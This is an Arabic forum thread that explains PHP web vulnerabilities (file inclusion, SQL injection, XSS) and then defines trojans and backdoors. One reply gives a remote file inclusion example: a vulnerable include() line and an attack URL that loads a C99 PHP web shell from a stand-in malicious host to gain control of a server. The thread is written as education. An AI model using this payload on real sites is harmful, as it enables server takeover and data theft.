بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته





الموضوع عن أخطر أنواع الثغرات وشرح لكل نوع حسب الخطورة.

بسم الله نبدأ/

ما هي الثغرات ؟

الثغره هي عبارة عن خطأ برمجي يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه.

الثغرات كثيرة لاتعد ولاتحصى في أنواع كثيرة من الأنظمة
وسأتطرق لثلاث أنواع أساسية في نظام php


1- File Include (إدراج ملف)

2- Sql Injection (تنفيذ أوامر في قاعدة البيانات)

3- XSS

(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)

هنا يهمنا ثغرات المنتديات ولن نتطرق لأي سكربت آخر.



النوع الأول: ثغرة File Include /
هو أخطر أنواع الثغرات ويسري عبر أخطاء برمجية مما يجعل الهكر

يقوم بإدراج ملف she ll خطير يمكنه من التلاعب بالموقع واختراقه.

النوع الثاني: ثغرة Sql Injection /
وهذا أقل خطورة من الفايل انكلود ويقوم عبر أخطاء برمجية بإرسال أوامر إلى قاعدة البيانات

مثلاً أمر لقراءة معلومات عضوية الأدمن رقم واحد أو أمر لتغيير كلمة مروره .

النوع الثالث:XSS /
يعتبر أقل خطورة من النوع الأول والثاني وأكيد الكل سمع بهذا النوع من الثغرات،
وهذي الثغرات من خلالها نقدر نسحب كوكيز أي عضو بالموقع مثل الهوتميل لكن تعتبر أقل خطورة

في استغلالها . وأقرب مثال ثغرات الـ xss في موقع الهوتميل

وبالإمكان أيضاً ندخل من خلالها مثلاً بعضوية المدير العام كمثال في المنتدى بس هنا خطورتها ضعيفه لأننا لو دخلنا ما نعرف الباس .


هذا مالدي وتقبلوا تحيتي.

(( منقول للإفادة )) ..

دمتم بحفظ الله ورعايته ...

شرح موفق و نقل مميز

بس انا حابب نبه لخطأ شائع الثغرة الاولى اسمها هو Remote File Inclusion او

Local File Inclusion

هلأ نحنا بيهمنا الاولى لأنو شاثعة اكتر

شو السبب لهي الثغرة ؟؟

السبب هو خطأ برمجي في تطبيق من تطبيقات الويب ، يمكن ال Attackers من تشغيل كود هو

من يختره ، و هو ما يعرف عادة ب PHP SHELL ، يكون له وظيفة معينة مثل اخذ روت على موقع

او حتى على سيرفر حسب الثغرة المستثمرة ، و حسب قدرات هذا الشيل .


اين يمكن ان تتواجد هكذا ثغرة ؟؟ و من اين اتت تسميتها ؟؟؟

الثغرة من اسمها Remaote File اي انها من خارج الموقع عكس Local File Inclusion التي

تكون اخطر بكثير .

هلأ ان شاء الله تكونو لهون تمام ؟؟؟؟

و اساس هذه الثغرة هي احد تعليمات ال PHP التالية :

include($page . '.php');

و متل ما بتعرفو هي التعليمة ب PHP بتمن من ادراج ملف (PHP مثلا ) و متل ما بتعرفو

المتحول $PAGE يمكن استثماره من المخترق على الشكل التالي (على سبيل المثال )

http://www.vulnerable.website.com/index.php?page=http://www.malicious.code.com/C99.php?

و هنا تعليمة include() تستدعي الكود الخبيث من رابط خارجي مساره هنا http://www.malicious.code.com/C99.php

و هذا لأن تعليمة البي اتش بي هذه تسمح لتنفيذ الكود من السيرفر الحالي او من سيرفر

خارجي على حد سواء . و هذا ما حدث بالفعل .........

و هنا سيحاول الملف الاصل ان يستدعي الملف التالي

http://www.malicious.code.com/C99.php.php

و لأن المهاجم هنا لا يعرف الكود الاساسي بالضبط ، فانه يضع علامة ?

و هذا ما يجعل الكود في الملف الاصل يستدعي الملف كباراميتر

http://www.malicious.code.com/C99.php?.php

و هذا يجعل المهاجم يضمن اي ملف خارجي بسهولة و ذدلك عبر تحرير الرابط

و عادة يضمن المهاجم ملف WEBSHELL أو PHPSHELL و هذا ما يسمح له عادة من

استعراض و تحرير و حذف و اضافة ملفات الى سيرفر الاستضافة الذي تم اصابته باكلود

الخبيث ، كما ان المهاجم للموقع عبر هذه الثغرة يمكنه من استخدام PHPSHELL لسحب

روووت على السيرفر

و لنا تكملة فيما بعد ان شاء الله

الله يعطيكم العافية ياشباب على الشرح ..

بس بدي اطلب من يلي عندو معلومات عم باقي الثغرات يضيفها ..لانو المعلومات مهمة جدا ..

بانتظار التتمة منك أخ محمود ...

بكل الشكر أبو يامن

شو هاد يا بوند شي رائع الصراحة
يعطيك العافية

يسعدني اصدقائي ان نتابع سويا بعض الدروس و المفاهيم ،وهي سلسة أمل ان نستطيع اكمالها سويا ، و

هي وفق منهاج الحماية العالمية المعتمدة الذي اتمنى ان يعود بالفائدة علينا جميعا

و هذه الدروس كلها حصرية لموقع التميز الدمشقي ، و لم يسبق لاحد ان كتب هذه المقالة باللغة العربية في

مواقع مشابهة ، فهي منتقاة من اقوى مراجع الحماية الاجنبية .

و اسمحو لي ان اشرح لكم اليوم مصطلحين مهمين و هما

Trojans and Backdoors

تعالو بنا نتعرف على الية عمل Mechanism هذين النظامين للمهاجمة

كثير منا سمع عن هذين المصطلحين .. و لكن قلة من يعرف معناهم بالضبط و هنا احببت ان

اشرح القليل عن هذين المصطلحين و خطرهم على المواقع (اي نظام برمجي على الويب)

اولا :

Trojan horse :

----------------------------------------------------------------------------------------------------
التعريف :

- برنامج غير مصرح به unauthorized program موجود ضمن برنامج شرعي legitimate program

هذا البرنامج الغير مصرح به يقوم بمهام غير معروفة (و ربما غير مرغوبة ) من قبل مدير النظام .

- برنامج شرعي legitimate program تم التعديل عليه من قبل كودات خبيثة و دخيلة مما يعدل

في وظائف هذا البرنامج الشرعي ليقوم بمهام غير معروفة (و ربما غير مرغوبة ) من قبل مدير

النظام .

- اي برنامج ينفذ مهمات مرغوبة و مطلوبة ، لكن و بسبب كود خبيث في داخلها ، فانها تنفذ

مهام مصرح بانها غير ضرورية او متطلبة لمدير النظام .

-------------------------------------------------------

هذا التروجان ممكن ان ينفذ اي شي يستطيع فعله المستخدم الذي قام بتشغيل هذا البرنامج

الدخيل من ... ||| حذف للملفات ||| تعديل على الملفات ||| تنصيب برامج كتلك التي

تسمح بوصول غير شرعي للشبكة ... و لهذا فالتروجان خطره بانه يستطيع القايام بصلاحيات

لا يمتلكها المستخدم للنظام بحد ذاته ، فهو يقوم بزيادة مستوى الوصول level of access

الذي يستطيع ان يصله المستخدم ، فهو يقوم باصابة النظام exploiting System الذي يحوي

على نقطة ضعف vulnerability .

و تعتبر التربة الصالحة لمثل هذه برامج هي الانظمة التي تحوي على كلمات سر مخزنة كنص

عادي او كلمات السر المرسلة عبر الشبكة كنص عادي يمكن قراءته بسهولة او المشفر

بطرق تشفير ضعيفة سهلة فك التشفير .

و هذه الصورة تبين طريقة اتصال المهاجم لكمبيوتر الضحية و اتصاله بالتروجان

251

حيث يتم وصول المهاجم الى النظام المصاب بينما هذا النظام على الشبكة online


و اقرب تشبيه لهذ العملية .. هي Client - Server

حيث يتم اتصال المهاجم من جهازه (و هو هنا زبون ) ، و يطلب خدمات من الكمبيوتر المزود (السيرفر و هو

الكمبيوتر المصاب ).

و حيث لا بد من معرفة اي بي النظام المراد اختراقه لتتم العملية ، و ذلك عن طريق نظام المراسلات على

الاغلب ك ICQ .

هذا و يجدر بالذكر ان غالب بروتوكولات المستخدمة هي TCP و احيانا UDP

و الى هنا يكفي اليوم و قريبا باقي المقالة ......... فارجو ان تتابعو الموضوع فهو غاية في الاهمية للجميع

اسف على لاانقطاع لأسباب قاهرة

و ان شاء الله لحكمل شوية شرح حسب استطاعتي

و تحيتي للجميع